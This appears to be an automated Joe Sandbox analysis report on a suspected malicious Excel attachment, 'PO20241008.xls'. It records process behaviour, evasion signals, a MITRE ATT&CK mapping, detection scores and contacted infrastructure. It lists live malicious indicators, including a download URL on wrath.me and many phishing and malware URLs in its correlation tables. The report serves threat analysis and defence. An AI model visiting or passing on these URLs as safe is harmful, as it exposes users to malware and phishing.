Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PO20241008.xlsStatic file information: File size 1094656 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: 3EF40000.0.drInitial sample: OLE indicators vbamacros = False
Source: PO20241008.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO20241008.xlsStream path 'MBD0015E099/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: PO20241008.xlsStream path 'Workbook' entropy: 7.99857057474 (max. 8.0)
Source: 3EF40000.0.drStream path 'MBD0015E099/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
Source: 3EF40000.0.drStream path 'Workbook' entropy: 7.94504392404 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 422Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts3
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection		1
Disable or Modify Tools		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO20241008.xls13%ReversingLabsDocument-PDF.Trojan.Heuristic
PO20241008.xls100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
wrath.me
188.114.96.3
truefalse
    		unknown
    s-part-0017.t-0009.t-msedge.net
    		13.107.246.45
    		truefalse
      		unknown
      s-part-0032.t-0009.t-msedge.net
      		13.107.246.60
      		truefalse
        		unknown
        18.31.95.13.in-addr.arpa
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://wrath.me/5H4sudfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://wrath.me/5H4sudmPO20241008.xls, 3EF40000.0.drfalse
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              188.114.96.3
              		wrath.meEuropean Union
              		13335CLOUDFLARENETUSfalse
              13.107.246.60
              		s-part-0032.t-0009.t-msedge.netUnited States
              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              72.5.42.5
              		unknownUnited States
              		16769UNASSIGNEDfalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1529028
              Start date and time:2024-10-08 15:36:18 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 13s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Potential for more IOCs and behavior
              Number of analysed new started processes analysed:11
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:PO20241008.xls
              Detection:MAL
              Classification:mal64.winXLS@4/20@2/3
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .xls
              • Changed system and user locale, location and keyboard layout to French - France
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Active ActiveX Object
              • Scroll down
              • Close Viewer

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 52.109.76.243, 20.189.173.16, 52.109.89.18, 20.42.73.28
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, onedscolprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: PO20241008.xls

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:38:46API Interceptor477x Sleep call for process: splwow64.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.96.3QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/fOmsJ2bL/download
              NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
              • www.thetahostthe.top/9r5x/
              RFQ 245801.exeGet hashmaliciousFormBookBrowse
              • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
              74qgPmarBM.exeGet hashmaliciousPonyBrowse
              • kuechenundmehr.com/x.htm
              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
              • www.cc101.pro/ttiz/
              http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
              • revexhibition.pages.dev/favicon.ico
              http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
              • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
              http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
              • www.tkmall-wholesale.com/
              c1#U09a6.exeGet hashmaliciousUnknownBrowse
              • winfileshare.com/ticket_line/llb.php
              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
              • filetransfer.io/data-package/eZFzMENr/download
              13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
              • www.mimecast.com/Customers/Support/Contact-support/
              http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
              • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              wrath.meQPS-36477.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              s-part-0017.t-0009.t-msedge.netRequest for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • 13.107.246.45
              SgqO4P37cK.exeGet hashmaliciousFormBookBrowse
              • 13.107.246.45
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 13.107.246.45
              frik.exeGet hashmaliciousXmrigBrowse
              • 13.107.246.45
              Windows Defender.exeGet hashmaliciousXWormBrowse
              • 13.107.246.45
              Message_2551600.emlGet hashmaliciousUnknownBrowse
              • 13.107.246.45
              Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
              • 13.107.246.45
              SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
              • 13.107.246.45
              Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
              • 13.107.246.45
              po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
              • 13.107.246.45
              s-part-0032.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, VidarBrowse
              • 13.107.246.60
              qEudOcCB12.exeGet hashmaliciousRedLineBrowse
              • 13.107.246.60
              Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
              • 13.107.246.60
              SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
              • 13.107.246.60
              https://url.us.m.mimecastprotect.com/s/ilkSCZ6mm3hDOA2KCjhRFBSqQQ?domain=google.chGet hashmaliciousUnknownBrowse
              • 13.107.246.60
              lHHfXU6Y37.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              SteamCleanz Marlborough Limited.xlsxGet hashmaliciousUnknownBrowse
              • 13.107.246.60
              SKGOzZRZGX.exeGet hashmaliciousStealcBrowse
              • 13.107.246.60
              VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
              • 13.107.246.60
              MmcJhaiYNh.exeGet hashmaliciousStealcBrowse
              • 13.107.246.60

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              UNASSIGNEDLYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
              • 131.226.2.60
              na.elfGet hashmaliciousMiraiBrowse
              • 147.136.113.113
              na.elfGet hashmaliciousUnknownBrowse
              • 205.231.177.121
              na.elfGet hashmaliciousMiraiBrowse
              • 209.104.51.157
              PO20241003.xlsGet hashmaliciousUnknownBrowse
              • 72.5.43.53
              PO20241003.xlsGet hashmaliciousUnknownBrowse
              • 72.5.43.53
              PO20241003.xlsGet hashmaliciousUnknownBrowse
              • 72.5.43.53
              file.exeGet hashmaliciousUnknownBrowse
              • 72.5.42.222
              gmpsl.elfGet hashmaliciousMiraiBrowse
              • 156.134.164.58
              CLOUDFLARENETUSoriginal (3).emlGet hashmaliciousUnknownBrowse
              • 172.64.41.3
              https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.zaGet hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              QPS-36477.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              PO59458.exeGet hashmaliciousFormBookBrowse
              • 104.21.73.154
              114mCZlpa3.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              Update.jsGet hashmaliciousNetSupport RATBrowse
              • 104.26.1.231
              Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              osjCeEFNrF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.13.205
              LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
              • 172.67.74.152
              MICROSOFT-CORP-MSN-AS-BLOCKUSoriginal (3).emlGet hashmaliciousUnknownBrowse
              • 52.168.112.67
              Remittance_Raveis.htmGet hashmaliciousUnknownBrowse
              • 150.171.28.10
              phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
              • 52.109.76.144
              na.elfGet hashmaliciousUnknownBrowse
              • 21.182.196.191
              na.elfGet hashmaliciousUnknownBrowse
              • 21.236.21.109
              na.elfGet hashmaliciousUnknownBrowse
              • 51.124.254.248
              na.elfGet hashmaliciousUnknownBrowse
              • 22.222.181.240
              na.elfGet hashmaliciousUnknownBrowse
              • 21.7.137.29
              https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
              • 150.171.27.10
              na.elfGet hashmaliciousUnknownBrowse
              • 20.200.7.245

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              6271f898ce5be7dd52b0fc260d0662b3Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Audio_Msg..00293614554893Transcript.htmlGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              +18365366724753456-83736-10244688.htmlGet hashmaliciousHTMLPhisherBrowse
              • 188.114.96.3
              https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
              • 188.114.96.3
              https://cloudshare.weil.com/invitations?share=f213408950da5c01bcf2Get hashmaliciousUnknownBrowse
              • 188.114.96.3
              https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousCredential FlusherBrowse
              • 188.114.96.3
              https://octo9.com.ng/Greula/Get hashmaliciousUnknownBrowse
              • 188.114.96.3
